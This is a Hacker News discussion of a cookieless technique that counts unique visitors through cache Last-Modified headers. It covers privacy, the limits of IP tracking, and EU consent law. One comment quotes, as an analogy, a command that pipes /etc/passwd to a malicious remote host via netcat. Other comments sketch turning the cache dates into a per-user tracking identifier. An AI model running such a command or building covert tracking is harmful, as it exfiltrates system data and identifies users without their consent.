Using a date-modified header to detect unique visitors without using cookies

dahfizz · on Nov 30, 2022

Threads like this kinda make me sad about HN. Every single comment is about how this technique might possibly be abused to track users in very specific scenarios (i.e. you may be able to identify your most active user).

If a web server wanted to track you, they would just use your IP. This is a clever technical trick to count your number of users without collecting any personal data. I don't understand why that is such a bad thing?

Sohcahtoa82 · on Nov 30, 2022

> If a web server wanted to track you, they would just use your IP.

I'd think a HN user would know that using an IP to track isn't effective.

For most home desktop users, at best, it tracks an individual household, not a person. For corporate users and highly privacy-conscious home users, it's probably completely worthless as VPNs will make everyone come from a single IP.

For mobile users, it's completely worthless. You'd be tracking users of a specific WiFi network. If your phone is connecting via IPv4, then who knows who you're tracking, as phones on a mobile network will share an IP address.

ketralnis · on Nov 30, 2022

And if you think VPN users are too obscure a use case to account for, a specific case I've dealt with is (1) all of AOL coming from one IP in Virginia (yes this was a while ago) and (2) almost every university appearing as a single IP (on a website frequented by university students)

mike_d · on Nov 30, 2022

At a previous job we tracked unique visitors to prevent ad fraud. You'd find not only individual IPs with thousands of users behind them, but also larger populations of users numbering in the tens of thousands behind a small block of 8-16 IPs.

The craziest was a large multinational corporation that (I guess for security?) changed their egress IP daily. The first three octets remained the same and the fourth was equal to the day of the month UTC. Really screws things up when you use a 14 day rolling window of previous traffic for comparisons.

jgalt212 · on Nov 30, 2022

As recently as 2006, an entire country was behind a VPN using a single public IP address. If lore can be believed...

https://superuser.com/questions/1013630/why-does-qatar-use-a...

kccqzy · on Nov 30, 2022

Universities do that now? When I was in college, if one connects to the visitor network they'd give you a RFC1918 address with NAT and a restrictive firewall, but if one connects to the regular network and authenticates as a student, they give you a publicly routable IP address.

jesprenj · on Nov 30, 2022

Depends on a lot of factory. The primary school I was a student at had public IPs at every computer, our national academic and research network operators are encouraging local network operators to avoid private IPs. But the high school at which I'm currently a student, has private IP addresses on every computer and a single external IPv4 for the entire facility. It's not so one sided.

lazide · on Nov 30, 2022

Many will also push http/https proxies regardless of IP addressing schemes, so even if one user bypasses it, anyone using defaults will come from whatever the external proxy IP is.

ketralnis · on Nov 30, 2022

I went to a community college that did transparent HTTP proxying with not just deep packet inspection but caching and "security"-oriented javascript injection. Headers would get reordered, and its parser wasn't perfect so multi-line headers would get broken sometimes. They'd inject JS into pages to scan for... something? Other injected JS? I have no idea. But it was impossible to directly connect to another server without going through their proxy even though from the TCP layer it looked like you were. Lots of difficult to debug issues.

lazide · on Nov 30, 2022

Wow, that’s impressively evil. Right up there with the old ‘rewrite DNS traffic’ trick from ISPs.

Any idea what make/model the proxy was?

tonyarkles · on Dec 1, 2022

Oh man, an old employer had one that did the same HTTP header monkeying. I discovered it because it broke, of all things, the C2 wiki. I thought the wiki was down when sent a link to a coworker but then checked from my home machine (working remote but over Remote Desktop). And then, of course, had to figure out why it would work at home but not at work :D

I believe it was FortiGate but don’t quote me on that.

It also liked to drop idle TCP connections out of its routing table without sending a FIN or RST. HashiCorp Vault, at the time, only used TCP keep-alive and no additional in-band heartbeat mechanism. Naturally, the firewall dropped the idle connection earlier than the default keep-alive interval (which is long…). Additionally, packets sent to an IP-port combo that it didn’t have in its routing table were black holed, without an RST. We had this painful bug to chase where first thing every morning we could read but not write to Vault for a few minutes and then it work fine for the rest of the day without incident.

I left tcpdump running overnight to see it. At night no one was using Vault… first thing in the morning, the first write goes out to the existing (still valid on both sides according to netstat) but just disappears into the ether. Takes a few minutes for the write to timeout (while spamming retries) at which point Vault closed the connection and started a new one. I just about flipped the table over.

Edit: and just like that, Twitter delivers https://twitter.com/substitute/status/1597695409903714304?s=...

ketralnis · on Nov 30, 2022

Sadly that's well beyond my memory now. It was pretty formative for me though because I learned a lot of networking and programming and unix stuff so that I could write a TCP-over-HTTP tunnel to a home server just to bypass it. So all in all, great success to be honest.

jesprenj · on Dec 2, 2022

Interesting. There's a Fortinet product as well in our school. I bet it's corruption and some sysadmin is somehow earning money, because it's so obviously unnecessary.

And it's set to block games. Ironically, I tried playing minecraft on a library computer and the server connection succeeded. Worst of all, lichess.org is blocked so students have to compete using their LTE network during chess tournaments.

It shows that we have a part private part state owned company employed as sysadmins in our school. They don't really understand the needs of the school.

bigiain · on Nov 30, 2022

Last time I worked on a project that cared/tracked this (~4 years back), all the prepaid cellular data users from one of the big 4 telcos here ended up on CGNAT and appeared to come form a small pool of 4 IP addresses.

mgbmtl · on Dec 1, 2022

Just use IPv6, and all mobile users will have unique addresses (although they might rotate, and IP tracking is generally not very reliable, as other mentioned).

bawolff · on Nov 30, 2022

I mean, i expect most people who use a vpn to also use incognito mode as well, which i assume would prevent this type of tracking.

nottorp · on Nov 30, 2022

We tend to object to people considering it normal to track us. Regardless of means.

lolinder · on Nov 30, 2022

Counting is not the same as tracking. The technique proposed would in most cases be useless for trying to distinguish individuals, much less identify them. It's the computer equivalent of the person standing out in front of Costco with a clicker counter.

MereInterest · on Nov 30, 2022

In principle, screen resolution would in most cases be useless for trying to distinguish individuals. After all, it wouldn't even distinguish the underlying hardware, let alone a user of that hardware. But given omnipresent tracking, it's one more bit that can be used to identify you.

In addition, your comment shows a severe lack of imagination. Suppose I'm a malicious server who wishes to track users.

* For each new user, select a random "late-modified" date. Now, I can clearly distinguish between multiple different users, because "1985-01-01T00:00:10" is probably the 10th visit from whoever was given "1985-01-01T00:00:00" on their first visit.

* If I have too many users for the above approach to uniquely identify a person, add more cached items. With HTTP/2, both HTTP requests would use the same TCP connection, so I can correlate the requests together.

And, bam. That goes from "useless for trying to distinguish individuals, much less identify them" to a unique identifier stored in the cache invalidation dates.

lolinder · on Nov 30, 2022

That is a different technique that uses the same medium of storage. When I say "this technique" I'm referring to specifically what was discussed in the article.

"Evil tracking companies will do evil things with any protocol features you give them" is already well known and there's not much to say about it that hasn't been said. What OP is actually doing is clever and new to me.

MereInterest · on Nov 30, 2022

I agree that it is clever, and it is new to me as well. However, saying that an obvious extension to a technique (posted by multiple people independently, no less) is a different technique altogether and therefore not germane is going a bit far.

If I post a privilege escalation exploit that allows me to execute "cat /etc/sudoers", and somebody points out that it could also be used to execute "cat /etc/passwd | netcat malicious-remote-server.com", that's an obvious extension of the same technique. This is the same, where the same technique may be used for more intrusive attacks than are performed in the initial proof of concept.

lolinder · on Nov 30, 2022

This kind of attack isn't new, though, trackers have been using side channel tracking forever now. A quick search shows that this exact side channel tracking vulnerability was discussed in the year 2000 [0].

I'm not saying the technique isn't similar: I just object to people dogpiling on OP because other people can and do abuse the same header in nefarious ways. It's not constructive, just a pointless attack on someone who's actually trying to improve privacy.

[0] http://www.sourcefrog.net/projects/meantime

MereInterest · on Dec 1, 2022

I wasn't attempting to dogpile, and am sorry if it came across that way. I agree that this scheme would, if used as a replacement for cookies in the manner described by the OP, be a strict improvement on the current state. That's the first step in evaluating a proposed privacy improvement.

However, that is only sufficient if you already trust the operator of the server to maintain that same implementation. That may work for some threat models, such as a website that is currently run by a trusted individual that may later be bought by a malicious actor, but it isn't sufficient in all cases. Across the entire ecosystem, there's a sequence of questions that needs to be asked.

1. How would a non-malicious actor implement the proposed system?

2. What is the minimal amount of information that must be provided for a non-malicious actor to benefit from the proposed system?

3. What could a malicious actor do with that minimal amount of information?

4. If a malicious actor could use this information, are there additional steps the user can take to mitigate those effects?

Together, these questions help to predict the effects of the proposed implementation becoming the standard. Applying it to this article:

1. As described in the original post.

2. The browser must cache files according to the cache policy requested, and the browser provides accurate information about its cache for subsequent requests.

3. Answered in previous comments, that malicious actors could use this to reproduce the same information as is stored in cookies.

4. I'm not sure yet, but I'm picturing an approach where the "if-modified-since" header is deliberately varied for some requests, and abnormal results cause the caching policy of that website to be ignored as untrustworthy.

When people try to figure out what malicious acts could be done, it's moving the conversation from the first two questions and toward the last two questions. It isn't malicious, or reading into the original poster's intentions, but is an attempt to predict what malicious actions will eventually occur, and to implement mitigations as soon as possible.

xanthine · on Dec 1, 2022

Unrelated: The link to meantime.py on this page is broken, and the correct link is http://sourcefrog.net/projects/meantime/meantime.py

dahfizz · on Dec 1, 2022

Of course this technique could be abused by a bad actor. That's true of literally everything in computing. Do you think we should ban encryption because bad people might encrypt stuff?

TFA describes a way to provide basic analytics in a way that completely respects the user's privacy. That's a good thing.

SkyBelow · on Nov 30, 2022

Counting is not tracking, but counting unique visitors requires tracking to know they are unique. If the person outside of Costco is counting unique visitors, they must be tracking who has already visited and who has not. Even if they aren't doing anything else with that information and forgetting it each night, it is tracking. The existing abuse of tracking has led to a level of backlash where any tracking is seen through the worst possible lens.

jcuenod · on Nov 30, 2022

It doesn't require tracking. Tracking would mean I could tell that user x has returned n times. But I have no idea who has returned, only that someone has returned n times.

The person standing outside Costco is counting people by giving them a colored sticker when they walk through the door. If they show up already having one, the counter issues a different color. Who has the stickers is unknown; only the number of stickers distributed in each color is known.

As has been said, this is not to say the technique couldn't be used for nefarious purposes. In this case, it's not, though.

SkyBelow · on Nov 30, 2022

That's still a form of tracking. Maybe not enough to identify unique users in some use cases, but even just knowing someone has been here n times is enough if the user numbers are low enough that you can identify users by unique n counts and patterns of n (such as if one user is at 500 and another is at 490, if the second one is logging in daily while the first one hasn't logged in for a few months, and you see the 490 go 491, 492... when they go from 499 to 500, the chance when a 500 logs on tomorrow and becomes 501 it was the 490 account that has been logging in daily).

jcuenod · on Nov 30, 2022

Must admit, I've never thought of "number of times I've visited your site" as PII. Number of times I've visited every site in my browser history, maybe, but not "number of times I've visited this specific site". I'm thinking about it, but I'm not immediately convinced.

TeMPOraL · on Nov 30, 2022

That's because you're forgetting the temporal domain. As in GP's example, a count alone may not mean much, but a time series of counts will allow you to uniquely identify a subset of the users.

ilyt · on Nov 30, 2022

Kinda need one for the other if you want to distinguish different users vs just one user clicking a lot.

You need some kind of identifier to differentiate between different sessions, and the moment you generate that ID, using whatever way, you are tracking user.

lolinder · on Nov 30, 2022

No, you don't need an ID. The article has one implementation that avoids IDs, but here's a simpler one:

Place a cookie HAS_BEEN_ON_SITE=true as soon as someone loads any page.

Voila, your server can now distinguish between users who've been to your site and users who haven't, without being able to tell recurring users apart from each other.

The implementation in the article is fancier, because the cache control headers allow distinguishing this on a page-by-page basis, but it's the same general idea. Don't give the client an ID, just ask the client to tell you if it's been there before.

ilyt · on Nov 30, 2022

Putting cookie like that means consent thingy you need to add tho.

Only ones that you don't need are ones that are expected functionality of the site, like you don't need to put it for shopping basket

lolinder · on Dec 1, 2022

Yes, but whether you legally must get consent is a separate question from whether you can count unique visitors while still being unable to tell them apart from each other.

ilyt · on Dec 1, 2022

Back in my days we called those "tracking pixels" and it didn't even need a cookie.

That's just not a real problem to solve. If you don't want to track users just giving each one unique ID is not a problem if you don't store them for future lookup.

The fact remains that from client perspective client have no way of telling whether you track them or not so you can't really prove to user you're not tracking them.

account42 · on Dec 2, 2022

Reminder that the GDPR does not care about cookies specifically but about personal data and tracking in general. Using the the cache invalidation for tracking does not require any less consent then the equivalent cookie.

However, it does look like the ePrivacy Regulation will clear this specific case up, at least according to Wikipedia:

> The proposal also clarifies that no consent is needed for non-privacy-intrusive cookies improving internet experience (like to remember shopping cart history) or cookies used by a website to count the number of visitors.

bawolff · on Nov 30, 2022

Why would it be useless? Just pick a random date for each user.

lolinder · on Nov 30, 2022

I'm not talking about what you could theoretically do with cache headers, I'm talking about what the author of the article is actually doing.

bawolff · on Nov 30, 2022

Its not like that is a far walk though. Its the exact same technique, just storing different data.

Respectfully i feel like this would be like seeing an example of css turning a page blue and claiming the technique is useless for turning the page red because that is not the specific example used.

lolinder · on Nov 30, 2022

If a bunch of people got up in arms and started complaining because the author of said CSS example hadn't considered that their code could be changed slightly to produce a hate symbol, I'd definitely still jump in and say "but that's not what they were doing!"

bawolff · on Dec 1, 2022

The original claim was "technique proposed would in most cases be useless"

Technique does not mean precisely what the person was doing just their method. Their technique has very obvious applications to user tracking.

dahfizz · on Dec 1, 2022

We may as well get rid of HTTPS entirely with that logic! Someone might abuse it, after all...

bawolff · on Dec 1, 2022

People have abused it (e.g. https://arxiv.org/pdf/1810.07304 ) and then it was changed to make it more difficult to abuse.

Ignoring risks do not make them go away, it just makes it easier for bad people to exploit them.

xapata · on Nov 30, 2022

Who's "we"? I don't mind it. I want advertisers to give me more relevant advertising.

dspillett · on Nov 30, 2022

Depends how you define relevant. Since actively trying to block stalky advertising behaviours I've had more interesting adverts (by “interesting” I mean new-to-me, not the “do you want another one of the thing you've already bought all you need of for a while” types). Things are relevant enough if, for instance, I get running related adverts while reading an article about other runners or browsing shoes.

In my experience the stalky behaviour doesn't improve the advertising relevance from my PoV, so the fact it means that all that derived information, some of it definitely PII, is out there so should anyone be able to hack into it they could use it for fraudulent purposes (identity theft, spear-fishing my contacts, …), makes the situation lose-lose for me.

It is worse for other people, as they have information that advertisers like to derive that might be extra sensitive. Being white, male, cis, middle-class, ete, with a life not interesting enough for there to be much to convincingly blackmail or threaten me about, living in western Europe, I'm pretty safe, but this can't be said for others especially in certain parts of the world (scarily religious ruled countries with bad records on individual rights, like Qatar and America to give two examples).

xapata · on Nov 30, 2022

I think you're conflating two different kinds of surveillance. The article is incrementing a counter to track the number of unique visitors.

If one is worried about blackmail or violence, especially from a government, then one should take precautions beyond complaining about the prevalence of browser cookies. Modern life, carrying a mobile internet device with GPS service, using a credit card, and going to places with security cameras, presents a variety of surveillance methods.

dspillett · on Dec 1, 2022

I was replying to the, well, the comment I replied to, rather than the counter method that started the thread. That post was anecdata about not minding being tracked, mine was anecdata regarding why I prefer we would not be.

> especially from a government

Where I to live in a regime like I mentioned above, I'd be as worried about vigilantism as much as government action.

> presents a variety of surveillance methods.

Fair point, but I see a difference between choosing to take a risk and companies trying to follow me around whether I want them to it not. Maybe it is my monkey brain that grew up noticeably before such tech was ubiquitous, said brain having been taught that being followed was at best a bit creepy!

xapata · on Dec 1, 2022

I used to follow the "I should keep everything private!" mantra that so many software engineers keep. Then I took a gig in advertising and realized how much information companies have despite my privacy efforts and learned to "love the bomb" so to speak.

To fight the problems posed by ubiquitous corporate and government surveillance, I suggest ubiquitous public surveillance. Like streamers do, but everywhere, all the time, publicly broadcasted. If I get disappeared, at least it'll be televised.

> vigilantism

There's a difference between being embedded in a supportive community, afraid of violence from outsiders, and being embedded in an antagonistic society, afraid of violence from insiders. In the former, ubiquitous public surveillance might help. In the latter, I think there is nothing to do but emigrate.

mschuster91 · on Nov 30, 2022

I don't want any unsolicited advertising - and I wish our societies would decide to outright ban advertising: Outdoor advertising is a nuisance for the eyes, radio and TV advertising is annoying AF (particularly as it tends to be mixed at a much greater loudness than the program running, my conspiracy theory is that this is done so people are forced to hear it when they go to the loo), paper advertising (e.g. in newspapers, flyers or postal spam) is a waste of paper and online advertising is an insane danger for privacy and a vector for distribution of malware.

Ideally, we'd have independent consumer protection entities, either government or private (e.g. German Stiftung Warentest), that would get products from companies to rank and test, so consumers could make actually informed decisions instead of being lured by hyped up advertising claims.

xapata · on Dec 1, 2022

At the margin, it's very hard to tell the difference between advertisements and other media. Today I listened to an enjoyable podcast with 5 speakers, 2 of whom are employed by the same company. During the episode, they discussed a product that those 2 worked on. Was this an advertisement?

I think any ban like that would have a "I know it when I see it" standard, which isn't wonderful.

nottorp · on Dec 2, 2022

HN is full lately of blog posts about $PROBLEM that end with "incidentally, we're a company that sells a product to solve $PROBLEM".

throwaway0x7E6 · on Nov 30, 2022

we the normal people

xapata · on Dec 1, 2022

Most of us think we're normal, I assume.

dahfizz · on Nov 30, 2022

This is not tracking. Could you explain why you think it is?

fanso99 · on Nov 30, 2022

Storing a cookie with a counter still requires consent afaik. If I am right, then this technique is not sufficiently different and also requires consent.

robertlagrant · on Nov 30, 2022

Why would that require consent?

chriswarbo · on Nov 30, 2022

Consent is always required; even if you just give people a random UUID, with no associated session/etc., that always requires consent.

There is a separate question, of whether consent is implied. If the identifying information is required to provide the user with a service they requested (e.g. a cookie for their online shopping cart), then consent is implied; no need to ask.

Hnrobert42 · on Dec 1, 2022

Giving a random UUID and giving someone a counter is significantly different. This is not identifying and thus does not require consent.

Hnrobert42 · on Dec 1, 2022

I don’t think this would require consent. It is not, as described in the post, uniquely identifying. It is not even pseudononymous. Thus, it is not personal data and does not require consent.

nottorp · on Nov 30, 2022

Could you explain why i should care, considering the current climate online?

When you try to cram a list of 500 "legitimate interests" down my throat, I will consider no interest as legitimate.

No matter what your goals are, you're in an industry that has zero trust these days.

dahfizz · on Nov 30, 2022

Without viable alternatives, sites will continue to use Google Analytics. If people like you fear-monger every alternative, sites will continue to use Google Analytics.

The method described in the article collects no personal data, collects no identifiable data, and is objectively more user-respecting than Google Analytics. But the behavior by people like you will help make sure that these alternatives don't gain traction and Google maintains their monopoly.

ohbtvz · on Nov 30, 2022

But google analytics isn't viable. It's illegal to use in the EU. Here's an explanation by, well, a viable alternative to google analytics: https://matomo.org/blog/2022/05/google-analytics-4-gdpr/

(I don't have a horse in this battle - my personal website doesn't have analytics at all.)

stalfosknight · on Nov 30, 2022

How about we just stop tracking users and hoovering up private data?

EGreg · on Nov 30, 2022

Not only that. The ability to track your own visitors is BUILT INTO how the web operates.

All a site has to do is include analytics in its server-side library. And that’s it. Doesnt even need CNAME cloaking. It can send the analytics anywhere.

The thing ITP and others try to stop is tracking users ACROSS sites.

But if you use single-sign-on with FB or any other service, they can get your public photo, name and just find you on faceboon thru some search engine that spidered all profiles.

So if you really want to be anonymous, stop using the single sign on and reusing passwords etc.

EGreg · on Nov 30, 2022

I mean, if people wanted to track visitors without cookies, they’d just use etags…

https://www.secjuice.com/etag-entity-tag-tracking/

Has Apple’s ITP closed this particular loophole by ignoring etags in third party iframes and capping them to 7 days etc. ?

It seems browsers will want to restrict ALL first party cookies to 7 days unless the visitor explicitly allows some domain to store their identity.

Frankly speaking, identity can be done better without cookies. Look at Web3 sign-ins, we need something built into the browser and seamless. For now maybe an extension. Then browser makers can have a privacy mode that retires cookies, entirely.

But how are you supposed to do caching without storing and sending identifying data equivalent to cookies?

Thoughts?

fanso99 · on Nov 30, 2022

My understanding is that most commenters are less critical of this specific implementation, but are alarmed by how this new technique could be used by other more nefarious parties in the future.

Counting visits is probably still not a fully GDPR-complaint use case, as the server stores data on the client's machine which is indistinguishable from a cookie containing a counter.

Hnrobert42 · on Dec 1, 2022

IANAL, but I spent a lot of time talking to them about GDPR.

First, this data does not and could not be used, if implemented as described in the post, to uniquely identify someone. As such, it is not personal data and not in scope of GDPR.

Second, DPAs have bigger fish to fry.

account42 · on Dec 2, 2022

I'm pretty sure the police will also have bigger fish to fry than someone who nicks your wallet. But somehow I don't don't you'd see that as a good argument for why that behavior shouldn't be accepted.

tinus_hn · on Nov 30, 2022

First, an IP address is considered personal data in the EU.

Second, an IP address is not enough, it may change or be shared. The advertisers ‘need’ to track you forever to serve you relevant ads. So they devise all kinds of tricks to do so.

aardvarkr · on Nov 30, 2022

> First, an IP address is considered personal data in the EU.

I don’t believe that’s true. To my knowledge, GDPR only treats IP address as personal data if it is associated with actual identifying information (like name or address). Collecting IP address alone, and not associating it with anything else, is completely fine (otherwise nginx and apache's default configs would violate GDPR), and through them basically every website would violate GDPR.

mytailorisrich · on Nov 30, 2022

That's correct. IP addresses are not personal data in themselves but they may become so if further data are collected or accessible which allow to identify individuals when used together with IP addresses.

fanso99 · on Nov 30, 2022

Collecting IP addresses and linking them to a user ID is considered PII as far as I know.

EGreg · on Nov 30, 2022

So the idea is that you can’t legally collect information in private that you can technically collect.

As long as a company is able to keep it a secret, they won’t get caught.

Witness the hundreds of violations of public trust by Facebook:

https://www.independent.co.uk/tech/facebook-app-recording-ca...

The only complete solution is technological!

rzzzt · on Nov 30, 2022

CGNAT complicates matters even further. Sometimes I'm placed way off within <country> if a site tries to go by GeoIP databases, as the provider placed a bunch of households behind a single address.

JohnFen · on Nov 30, 2022

After decades of straight-up abuse by this sector of the industry, including the subversion of countless "privacy respecting" data collection techniques, I think an extraordinary amount of skepticism and suspicion is more than understandable.

kccqzy · on Nov 30, 2022

Why would you put privacy respecting in quotes? The subversion of those techniques are probably just because those techniques are so new and people haven't had better technologies yet.

I personally consider those privacy respecting data collection techniques as a parallel with the development and use of cryptography on the web. In the beginning pretty much no one online used cryptography; later on we started using them but used weak ones ("export" cipher suites for example, or just look at the issues in early protocols like SSL 2.0 or SSL 3.0); nowadays almost everyone uses strong cryptography. Similarly, in the beginning pretty much no one cared about privacy when they did data collection; then we had begun to care more about privacy, but many schemes are easily broken due to for example misguided ideas of anonymization ("anonymization by hashing"), and we are also starting to see the development of newer private information retrieval schemes and differential privacy, etc. Unlike the cynics on this HN thread, I am quite confident that maybe a decade down the road the majority of data collection done by companies will be in a privacy preserving manner. Of course there will be outliers much like there are still websites that don't use https but those will be few and far between.

JohnFen · on Nov 30, 2022

I quoted the term not with the intention of disparaging the notion, but to indicate that I'm referring to a specific class of approaches. That said, the term has also been abused to the point where when it's used, I immediately doubt that it's accurate.

account42 · on Dec 2, 2022

Right, it's like the common "We value your privacy" statement when the real meaning is "we put a value on your privacy and want to collect it".

IshKebab · on Nov 30, 2022

It's not a clever technical trick. It's a pointless technical trick.

You can do exactly the same thing with cookies and they are better for privacy because there's an opt out mechanism. They're how you're supposed to do this sort of thing.

Using a trick like this is no different to cookies in the eyes of the GDPR. So the only reason to use this trick is if you don't want to respect your users' privacy by being able to block cookies.

Hnrobert42 · on Dec 1, 2022

This is significantly different from than cookies from a GDPR perspective. This is not uniquely identifying. There is no way for the site to know if you are this user who has visited 100 times or that user who was visited 100 times.

IshKebab · on Dec 1, 2022

No it isn't. Cookies don't have to uniquely identify you.

Just put "visit_count=5" or whatever in a cookie.

mozman · on Nov 30, 2022

Fingerprinting using WebRTC is far more effective. IPs are useless.

zackmorris · on Nov 30, 2022

I think this cache date trick is clever!

There are at least three fallacies with stuff like GDPR that trigger anxiety in people by convincing them that they can somehow safeguard their own privacy while surfing hundreds of websites per day, many in other countries. I'm not going to fully discredit them, just give counterexamples:

1) The internet can continue to work without tracking users

- Targeted advertising (can't have both, although I can't say that I'll miss ads)

2) Users care that companies have their personally identifiable information (PII)

- Users care how companies share and abuse their data for profit (they already know they're being tracked if they don't use something like TorBrowser)

3) Privacy protections actually result in privacy

- PRISM and similar will always find you: https://en.wikipedia.org/wiki/List_of_government_mass_survei...

So I view all of this security theater with utter skepticism. I think the only thing that can maybe save us is transparency. Letting users download their data and using the threat of audit to keep internet companies honest:

https://securiti.ai/blog/dsar-rights-and-compliance/

The rest of the squabbling about "no that's PII, you can't save that!" has only resulted in endless nagging and distraction. It's like trying to hide your address from the post office or thinking that your phone number is secret because it's not in the phonebook.

Although I do think it's kind of funny to make big companies feel like they're living under a police state. They'll work tirelessly to undermine these protections, which is why we'll eventually abandon them like we did with prohibition and McCarthyism because they just aren't enforceable when everyone is breaking the law. Or (equally likely) they'll work to bolster these laws to create new markets through power imbalance, ensuring that only the largest companies can meet compliance and smaller companies pay some sort of protection money against the threat of litigation, which opens the door to mass corruption. Both of these scenarios are ugly enough that I think this entire rabbit hole is suspect.

jefftk · on Nov 30, 2022

I think this is probably illegal in EU countries. The ePrivacy Directive requires consent before storing data on a user's machine that isn't strictly necessary for providing the service the user requested. Analytics isn't "strictly necessary", and ePrivacy doesn't care whether you use the Cookie header or some other method of storage.

I do think this is better for privacy than standard id-based approaches, but the law is very strict. More: https://www.jefftk.com/p/why-so-many-cookie-banners

(Not a lawyer)

Hnrobert42 · on Dec 1, 2022

Here is the ePrvacy Directive. I can’t find anything in it to back up your assertion, though.

https://eur-lex.europa.eu/legal-content/EN/ALL/?uri=CELEX:32...

jefftk · on Dec 1, 2022

The directive is a bit hard to read, but its widely understood to require at least notification before storing information on a user's device, probably consent. The guidance is a lot clearer: https://ec.europa.eu/justice/article-29/documentation/opinio...

hyperman1 · on Dec 1, 2022

I'm not sure the guidance applies in this case, as this technique is an edge case which the writers probably didn't foresee.

The ePrivacy directive itself has in article 3.1:

  This Directive shall apply to the processing of personal data [...]

which would mean it doesnt apply here, as there is no personal data.

In practice, I assume this one is for the judges.

yellow_lead · on Nov 30, 2022

Assuming you're correct, can anyone think of a way to count unique visitors without storing data on a users machine or using identifiable user information? Identifiable user information should include hashes that can be re-computed given the original information.

This isn't a criticism of the law, I'm just curious what options there could be, because I can't think of any.

rattt · on Dec 1, 2022

Something like HyperLogLog might be fine assuming you don't need perfect accuracy.

https://en.wikipedia.org/wiki/HyperLogLog

genewitch · on Nov 30, 2022

Hi there, Marketing Company Intern!

Tell them you'd rather make the coffee ;-)

411111111111111 · on Nov 30, 2022

Ha, that would explain that question. My first reaction was mostly confusion as there is so much prior art at this point, i.e. fingerprinting through installed add-ons, resolution/window size/system language, browser language, IP locality etc. There are even demo pages around which shows you just how unique your configuration is even without anything else.

https://amiunique.org/fp

yellow_lead · on Nov 30, 2022

Lol, I knew it would sound that way, but I don't work in this domain - just interested in privacy and this problem.

genewitch · on Nov 30, 2022

the only reason we could think of for wanting unique visitors was for the marketing people or investors/stakeholders/shareholders. Parsing the request logs should be sufficient for every other metric.

We had a bunch of meetings about this at what essentially amounted to a giant information superhighway billboard company. IIRC someone brought up using cache headers even back then, because it didn't require cookies or javascript, which we couldn't guarantee would be "up to date", this is back in "target IE6, still" days.

As one of my networking friends said, advertisers usually know everything about your metrics, even if you don't. You can't really fudge the numbers in your favor, so raw requests or QPS or whatever ancillary metric would be enough.

the method in the article is defeated by clearing your session when you're done browsing, or using incognito/private browsing tab, as that should mark all "cached" items for deletion.

Quarrelsome · on Nov 30, 2022

I thought GDPR cared mostly about uniquely identifying visitors which this does not do. You still need a cookie banner to state that you will put some data on their machine but you always need one of those.

jefftk · on Nov 30, 2022

> you always need one of those

The withcabin.com landing page claims you don't need consent banners to use it.

t0mas88 · on Nov 30, 2022

That claim is false in Europe. You need to ask permission for this approach, because you're storing something on the user's device (the generated date in the cache) that isn't strictly necessarily. The ePrivacy directive says you need permission for that, nowhere does the law specify "cookies" it's about any kind of data stored on the user device.

mgrund · on Nov 30, 2022

True it does not matter if it’s a cookie, or whatever. You need to look to the ePrivacy directive article 5.3 for which exemption case applies. In the case of timestamps, it would be case A :

> when the cookie is used “for the sole purpose of carrying out the transmission of a communication over an electronic communications network” (“Exemption A“)

Since the timestamp is no longer used solely for this purpose, you need consent.

jefftk · on Nov 30, 2022

Uh, yes? That's exactly what I've been saying upthread.

mulhoon · on Nov 30, 2022

Hi, author of the article here.

Just to give a little more background here.

Cabin doesn't store a row in a database for each visit. It only stores one row, per day per domain. The attributes for that row are simple tally counts - visits, uniques, bounces etc. So no identifier is stored, and the hits go into the tally. We do not store the fact that a user has visited x amount of times. The demo here is to show how the technique works.

Cabin used to detect only the presence of any last-modified date to determine if the visit is unique or not. But extending it to distinguish hits 1,2 and 3 (by adding 1 second to the start of the day) now allows us to count the bounce rates too.

jefftk · on Nov 30, 2022

Your landing page says "no cookies or consent banners" and "compliant with all privacy laws", but the timestamp approach stores data on a user's computer in a way that is not "strictly necessary in order to provide an information society service explicitly requested by the subscriber or user". Could you explain how you see your approach as compliant with the ePrivacy directive?

Full text: https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CEL...

Guidance: https://ec.europa.eu/justice/article-29/documentation/opinio...

slashdev · on Dec 2, 2022

So the moral of the story is to use passive fingerprinting that is able to identify and track individual users, because then you can skip the cookie banner and be compliant with the law?

I think I would rather use this and rely on the courts to interpret it fairly if it ever came to that, which it won't.

IshKebab · on Nov 30, 2022

Yeah this is just a cookie by another name. Probably already used by supercookies.

The GDPR doesn't single out cookies so you can't get around it by using a different storage device.

jefftk · on Nov 30, 2022

> The GDPR doesn't single out cookies so you can't get around it by using a different storage device.

Quibble: this isn't a GDPR issue, it's an ePrivacy issue. Two different regulations.

lolinder · on Nov 30, 2022

Thanks for sharing!

I personally don't have an issue with it, but one thing that might set some of the people here at ease is if you stopped incrementing the timestamp after the second visit.

This would give you three possible states anyone could be in: never visited, visited once, and visited more than once. It's less data, but still enough to give you your bounce rate and your total visits while minimizing the number of boxes you're sorting individual visitors into.

Terretta · on Dec 1, 2022

How do you distinguish two users with the same date stamp, to know they are two diff visitors?

    User A: last-modified: Wed, 30 Nov 2022 00:00:00 GMT
    User A: last-modified: Wed, 30 Nov 2022 00:00:01 GMT
    User B: last-modified: Wed, 30 Nov 2022 00:00:00 GMT
    User B: last-modified: Wed, 30 Nov 2022 00:00:01 GMT

Next you see:

    User ?: last-modified: Wed, 30 Nov 2022 00:00:02 GMT

Which user is it?

And have you had 2 count of visits, or 3 count? How do you know?

Finally, these aren't really counting visitors, but views, of this URL, by this browser, right?

There's a conventional taxonomy of terms for web stats, something like:

    - users (as in MAU)
    - visitors or uniques (typically daily uniques)
    - visits or sessions (multiple views from one visitor in a cluster)
    - views or pageviews (.html pages)
    - hits or requests (every object gotten from server: .html, .js, .jpg, etc.)

Looks like your GIST is causing a remote user agent to store a count of its own views.

// I haven't tried it, just a quick skim of the blog and the gist, raising this question. I'm probably missing something.

jrmg · on Dec 1, 2022

How I'm interpreting their explanations is that they don't (can't) tell which user it is. They just know you've had two two-time visitors, and one one-time visitor.

ohbtvz · on Nov 30, 2022

Have lawyers familiar with EU law vetted your technique? Could you share their legal reasoning? If not, why would anyone ever take the risk to use your product and face huge fines?

senko · on Nov 30, 2022

(Not OP)

I am all for privacy, use uBO, Firefox Focus / Incognito and Google alternatives. But if I have to consult a lawyer each time I write some code or write up a blog post, I'll take up gardening instead.

rcoveson · on Nov 30, 2022

How about just consulting a lawyer each time you abuse a protocol to get user's software to behave in a way that is invisible to them and benefits you?

There is already a correct way to tell a browser to tell the server something with each subsequent request: Cookies. Nobody needs to "write some code" here; it's already written. Working around the protocol isn't engineering, it's just lying.

